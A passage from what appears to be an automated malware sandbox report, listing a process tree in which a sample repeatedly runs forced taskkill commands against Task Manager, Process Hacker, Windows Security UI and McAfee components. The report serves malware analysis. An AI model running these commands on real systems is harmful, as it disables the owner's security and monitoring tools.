  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:4316
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:5204
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:2908
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:1664
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:5568
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:5264
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:4588
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:448
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5452
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:5332
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:3544
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5996
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  - Kills process with taskkill
  PID:6068
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:2996
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:1668
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:3824
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:3808
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:3488
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:2044
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:672
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:2028
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5604
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:1520
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:4412
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5304
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:4480
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:3216
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:8
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:5400
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:5264
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:1856
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:2448
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:5740
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5648
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:2224
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:1336
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:4268
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:3824
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5420
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:1632
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:2368
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:3808
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:3628
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:3580
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:4944
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:1664
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:1500
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5476
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:5964
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:804
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5440
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5400
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:5308
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:3916
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:2448
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:6120
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:5452
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:3024
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:5012
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:3760
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:4260
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:4720
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:6116
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:4412
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5328
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:5140
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:3880
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:3840
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:1432
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:5236
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:3004
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:2300
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  - Kills process with taskkill
  PID:3852
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5920
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:3812
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:3964
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:3216
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5744
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:5440
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:3460
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:2204
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:5572
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:4880
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:3720
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:3308
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  - Kills process with taskkill
  PID:5420
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:6000
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:5252
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:4088
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5268
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5624
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:2184
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:2336
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:5204
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:5348
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:5980
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:5244
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:3004
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5688
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:6128
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:4904
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:4240
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:3436
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:2448
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:3612
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:5308
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:4356
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:5264
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:5280
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  - Kills process with taskkill
  PID:6084
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:4340
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:3824
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:1136
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:5996
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:5708
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:4412
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:4260
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  - Kills process with taskkill
  PID:3672
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:4944
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:5548
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:4840
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:3772
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:2304
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:1144
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:2280
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5456
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:5848
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:5744
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5676
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5172
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:1880
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:4240
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:4436
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:2288
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:2888
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:2064
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:5164
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:1724
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:4020
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:1856
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:5876
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5996
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:4752
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:4260
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:3912
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:5784
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:4280
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:3540
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:2776
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:3592
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:856
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:1016
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:3224
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:5476
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:1336
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:2472
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:2244
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:4240
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:5172
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:6036
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:6132
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:3056
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:6000
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:4340
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:1724
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:5328
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:2824
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5876
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5564
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:5708
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:5688
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:916
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:3912
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:4708
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:2636
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:4944
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:748
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:668
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:4864
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:5744
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:4156
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:4696
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:1756
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:2472
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:4384
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1880
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:5812
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:2124
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:4376
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:116
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:1672
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:1632
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:2064
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:1520
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:6112
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:4904
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:964
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:1156
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:5784
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:412
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:2908
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:3912
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:3264
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:748
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:1144
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:4304
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5740
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5352
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:4156
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:728
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:5676
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:5904
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:3808
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:464
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:804
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:6140
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5164
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:2288
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:1124
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:3652
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:6076
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:3628
- C:\Windows\System32\taskkill.exe
